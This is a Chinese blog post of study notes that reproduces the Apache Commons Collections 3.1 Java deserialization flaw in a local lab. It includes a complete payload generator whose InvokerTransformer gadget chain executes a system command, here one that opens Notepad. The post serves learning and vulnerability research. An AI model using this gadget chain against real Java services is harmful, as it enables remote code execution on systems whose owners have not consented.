Java反序列化漏洞学习笔记

作者: Luan 分类: 学习笔记 发布时间: 2017-06-05 11:54

15年的老漏洞,翻出来学习学习,TSRC的文章很详细。

我的测试环境是win10企业版+jdk1.7,使用的代码:
反序列化输入(文件)的代码:

import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.ObjectInputStream;
public class test {
	public static void main(String[] args) throws FileNotFoundException, IOException, ClassNotFoundException {
		ObjectInputStream ois = new ObjectInputStream(new FileInputStream(new File("serial.bin")));
		String test = (String)ois.readObject();
		System.out.println(test);
	}
}

生成Payload的代码:

import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
public class test {
	public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException, FileNotFoundException, IOException {
		String[] execArgs = "cmd /c notepad".split(" ");
		Transformer[] transforms = new Transformer[]{
				new ConstantTransformer(Runtime.class),
				new InvokerTransformer(
						"getMethod",
						new Class[]{String.class,Class[].class},
						new Object[]{"getRuntime",new Class[0]}
				),
				new InvokerTransformer(
						"invoke",
						new Class[]{Object.class,Object[].class},
						new Object[]{null,new Object[0]}
				),
				new InvokerTransformer(
						"exec",
						new Class[]{String[].class},
						new Object[]{execArgs}
				)
		};
		Transformer transformerChain = new ChainedTransformer(transforms);
		Map tempMap = new HashMap<String,Object>();
		tempMap.put("value","lu4n.com");
		Map<String,Object> outputMap = TransformedMap.decorate(tempMap,null,transformerChain);
		//outputMap.put("","lu4n.com");
		String classname = "SuN.ReFlEcT.AnnoTATIon.".toLowerCase()+"AnnotationInvocationHandler";
		Class cls = Class.forName(classname);
		Constructor ctor = cls.getDeclaredConstructor(Class.class,Map.class);
		ctor.setAccessible(true);
		Object instance = ctor.newInstance(Retention.class,outputMap);
		
		ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(new File("serial.bin")));
		oos.writeObject(instance);
	}
}

如果运行反序列化输入的代码报错:

Exception in thread "main" java.lang.ClassNotFoundException: org.apache.commons.collections.map.TransformedMap
	at java.net.URLClassLoader$1.run(URLClassLoader.java:366)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:355)
	at java.security.AccessController.doPrivileged(Native Method)
	at java.net.URLClassLoader.findClass(URLClassLoader.java:354)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:425)
	at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:358)
	at java.lang.Class.forName0(Native Method)
	at java.lang.Class.forName(Class.java:278)
	at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:625)
	at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1612)
	at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1517)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1771)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350)
	at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1990)
	at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:500)
	at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:427)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:606)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)
	at test.main(test.java:9)

下载有漏洞的org.apache.commons.collections-3.1 ,导入项目就可以了。

先运行生成payload的代码,生成serial.bin,然后运行反序列化代码,正常情况就会弹出记事本。

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

2条评论
  • ddg

    2017年6月6日 上午8:56

    TSRC

    1. Luan

      2017年6月6日 上午9:05

      == 不小心打错了,已纠正,三克油

发表评论

电子邮件地址不会被公开。 必填项已用*标注